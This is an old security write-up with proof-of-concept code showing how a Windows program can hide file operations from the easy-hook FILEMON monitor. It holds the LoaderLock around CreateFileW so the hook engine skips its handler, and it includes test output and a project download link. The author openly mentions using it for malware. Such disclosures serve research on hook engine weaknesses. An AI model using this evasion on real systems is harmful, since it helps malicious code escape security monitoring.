Created: Sunday, December 14 2008 18:52.37 CST
Bypassing Windows hook engines that skip the hook handler while the LoaderLock is held
Author: Dreg

This project bypasses Windows hook engines that do not execute the hook handler while the LoaderLock is held.

As a concrete case, the project includes a bypass of the easy-hook FILEMON sample.

This POC tries to create two files with CreateFileW:
- no_bypass_hook.txt: which is logged by the FILEMON of easy-hook
- bypass_hook.txt: which bypasses the FILEMON of easy-hook

- The bypass method is to hold the LoaderLock around the call:
  - RtlEnterCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
  - CreateFile( ByPassFile.txt );
  - RtlLeaveCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
- This works because the Thread Deadlock Barrier (TDB) of easy-hook queries the
  Auxiliary Windows Library before calling the hook handler: if
  AuxUlibIsDLLSynchronizationHeld returns TRUE, easy-hook does not execute the hook handler.
- While the LoaderLock is held, AuxUlibIsDLLSynchronizationHeld always returns TRUE.

The code to bypass the easy-hook FILEMON hook handler is very simple:

    // Take the loader lock so that AuxUlibIsDLLSynchronizationHeld reports TRUE
    // and the hook engine skips its handler for the call below.
    RtlEnterCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
    HANDLE hFile = CreateFileW
    (
        FILE_BYPASS_HOOK,       // L"bypass_hook.txt"
        0,                      // no access requested; the call itself is what FILEMON logs
        0,                      // no sharing
        NULL,                   // default security attributes
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    // Release the lock immediately: nothing that loads a DLL or waits on another
    // thread may run between Enter and Leave, or the process deadlocks.
    RtlLeaveCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
    if ( hFile != INVALID_HANDLE_VALUE )
        CloseHandle( hFile );

After this, FILE_BYPASS_HOOK never shows up in the easy-hook FILEMON log.

Testing is simple: just run bypass_easyhook.exe, which creates the two files every two seconds:

0-
CreateFileW(bypass_hook.txt) <- This CALL BYPASS easy-hook

CreateFileW(no_bypass_hook.txt) <- This CALL NOT BYPASS easy-hook
...

Next, run FILEMON with the PID of bypass_easyhook.exe (from the directory that contains FileMon.exe):


C:\bypass_easyhook\Release>FileMon.exe 2628
...

Number of assemblies processed = 3
Number of assemblies installed = 3
Number of failures = 0

FileMon has been installed in target 2628.

[2628:2772]: "no_bypass_hook.txt"
[2628:2772]: "no_bypass_hook.txt"

Only no_bypass_hook.txt is logged; FILEMON never sees the CreateFileW of bypass_hook.txt :-).

Bypassing Windows hook engines that skip the hook handler while the LoaderLock is held is very simple with this trick.

But if you want to code serious malware or a serious program, hold the LoaderLock only in safe situations: it is very important to avoid deadlocks. Anything executed while the lock is held that loads a DLL, resolves a delay-load import, or waits on a thread that itself needs the loader lock will deadlock the process.

The project: http://www.fr33project.org/projects/bypass_easyhook.rar
